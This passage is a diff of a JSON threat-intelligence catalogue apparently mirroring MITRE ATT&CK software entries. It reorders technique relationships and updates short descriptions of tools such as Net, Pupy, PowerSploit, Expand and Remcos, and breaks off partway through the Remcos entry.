@@ ], "type": "uses" }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ @@ -1109,7 +1089,35 @@ "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "30973a08-aed9-4edf-8604-9084ce1b5c4f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1123,21 +1131,14 @@ "type": "uses" }, { - "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1151,7 +1152,28 @@ "type": "uses" }, { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1211,7 +1233,7 @@ "value": "PsExec - S0029" }, { - "description": "The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)\n\n[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) using net use commands, and interacting with services.", + "description": "The [Net](https://attack.mitre.org/software/S0039) utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. (Citation: Microsoft Net Utility)\n\n[Net](https://attack.mitre.org/software/S0039) has a great deal of functionality, (Citation: Savill 1999) much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through [Windows Admin Shares](https://attack.mitre.org/techniques/T1077) using net use commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user.", "meta": { "external_id": "S0039", "mitre_platforms": [ @@ -1236,21 +1258,7 @@ "type": "uses" }, { - "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1264,14 +1272,7 @@ "type": "uses" }, { - "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1284,6 +1285,34 @@ ], "type": "uses" }, + { + "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "15dbf668-795c-41e6-8219-f0447c0e64ce", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ @@ -1291,26 +1320,19 @@ ], "type": "uses" }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e7eab98d-ae11-4491-bd28-a53ba875865a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "03342581-f790-4f03-ba41-e82e67392e23", @@ -1342,14 +1364,14 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1383,14 +1405,14 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "241814ae-de3f-4656-b49e-f9a80764d4b7", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1710,7 +1732,8 @@ "mitre_platforms": [ "Linux", "Windows", - "macOS" + "macOS", + "Android" ], "refs": [ "https://attack.mitre.org/software/S0192", @@ -1736,56 +1759,14 @@ "type": "uses" }, { - "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1799,42 +1780,7 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1848,21 +1794,7 @@ "type": "uses" }, { - "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1883,7 +1815,28 @@ "type": "uses" }, { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e3a12395-188d-4051-9a16-ea8e14d07b88", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1897,28 +1850,21 @@ "type": "uses" }, { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ca1a3f50-5ebd-41f8-8320-2c7d6a6e88be", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1932,14 +1878,7 @@ "type": "uses" }, { - "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -1951,11 +1890,151 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "e01be9c5-e763-4caf-aeb7-000b416aef67", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f44731de-ea9f-406d-9b83-30ecbb9b4392", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "428ca9f8-0e33-442a-be87-f869cb4cf73e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "82caa33e-d11a-433a-94ea-9b5a5fbef81d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0fff2797-19cb-41ea-a5f1-8a9303b8158e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4", "value": "Pupy - S0192" }, + { + "description": "[Expand](https://attack.mitre.org/software/S0361) is a Windows utility used to expand one or more compressed CAB files.(Citation: Microsoft Expand Utility) It has been used by [BBSRAT](https://attack.mitre.org/software/S0127) to decompress a CAB file into executable content.(Citation: Palo Alto Networks BBSRAT)", + "meta": { + "external_id": "S0361", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0361", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/expand", + "http://researchcenter.paloaltonetworks.com/2015/12/bbsrat-attacks-targeting-russian-organizations-linked-to-roaming-tiger/" + ], + "synonyms": [ + "Expand" + ] + }, + "related": [ + { + "dest-uuid": "f2d44246-91f1-478a-b6c8-1227e0ca109d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + } + ], + "uuid": "ca656c25-44f1-471b-9d9f-e2a3bbb84973", + "value": "Expand - S0361" + }, { "description": "[Tor](https://attack.mitre.org/software/S0183) is a software suite and network that provides increased anonymity on the Internet. It creates a multi-hop proxy network and utilizes multilayer encryption to protect both the message and routing information. [Tor](https://attack.mitre.org/software/S0183) utilizes \"Onion Routing,\" in which messages are encrypted with multiple layers of encryption; at each step in the proxy network, the topmost layer is decrypted and the contents forwarded on to the next node until it reaches its destination. (Citation: Dingledine Tor The Second-Generation Onion Router)", "meta": { @@ -2016,14 +2095,14 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "3b0e52ce-517a-4614-a523-1bd5deef6c5e", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2068,7 +2147,7 @@ "value": "Responder - S0174" }, { - "description": "[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework compromised of [PowerShell](https://attack.mitre.org/techniques/T1086) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)", + "description": "[PowerSploit](https://attack.mitre.org/software/S0194) is an open source, offensive security framework comprised of [PowerShell](https://attack.mitre.org/techniques/T1086) modules and scripts that perform a wide range of tasks related to penetration testing such as code execution, persistence, bypassing anti-virus, recon, and exfiltration. (Citation: GitHub PowerSploit May 2012) (Citation: PowerShellMagazine PowerSploit July 2014) (Citation: PowerSploit Documentation)", "meta": { "external_id": "S0194", "mitre_platforms": [ @@ -2093,77 +2172,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2177,7 +2186,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2191,14 +2200,42 @@ "type": "uses" }, { - "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "dest-uuid": "72b74d71-8169-42aa-92e0-e7b04b9f5a08", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2212,14 +2249,56 @@ "type": "uses" }, { - "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "00d0b012-8a03-410e-95de-5826bf542de6", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "62dfd1ca-52d5-483c-a84b-d6e80bf94b7b", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1035cdf2-3e5f-446f-a7a7-e8f6d7925967", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2233,7 +2312,14 @@ "type": "uses" }, { - "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586", + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2300,6 +2386,13 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "d8d19e33-94fd-4aa3-b94a-08ee801a2153", @@ -2409,62 +2502,6 @@ ] }, "related": [ - { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", "tags": [ @@ -2473,7 +2510,14 @@ "type": "uses" }, { - "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2494,14 +2538,63 @@ "type": "uses" }, { - "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1b84d551-6de8-4b96-9930-d177677c3b1d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6faf650d-bf31-4eb4-802d-1000cf38efaf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2538,6 +2631,365 @@ "uuid": "33b9e38f-103c-412d-bdcf-904a91fff1e4", "value": "spwebmember - S0227" }, + { + "description": "[Remcos](https://attack.mitre.org/software/S0332) is a closed-source tool that is marketed as a remote control and surveillance software by a company called Breaking Security. [Remcos](https://attack.mitre.org/software/S0332) has been observed being used in malware campaigns.(Citation: Riskiq Remcos Jan 2018)(Citation: Talos Remcos Aug 2018)", + "meta": { + "external_id": "S0332", + "mitre_platforms": [ + "Windows" + ], + "refs": [ + "https://attack.mitre.org/software/S0332", + "https://www.riskiq.com/blog/labs/spear-phishing-turkish-defense-contractors/", + "https://blog.talosintelligence.com/2018/08/picking-apart-remcos.html", + "https://www.fortinet.com/blog/threat-research/remcos-a-new-rat-in-the-wild-2.html" + ], + "synonyms": [ + "Remcos" + ] + }, + "related": [ + { + "dest-uuid": 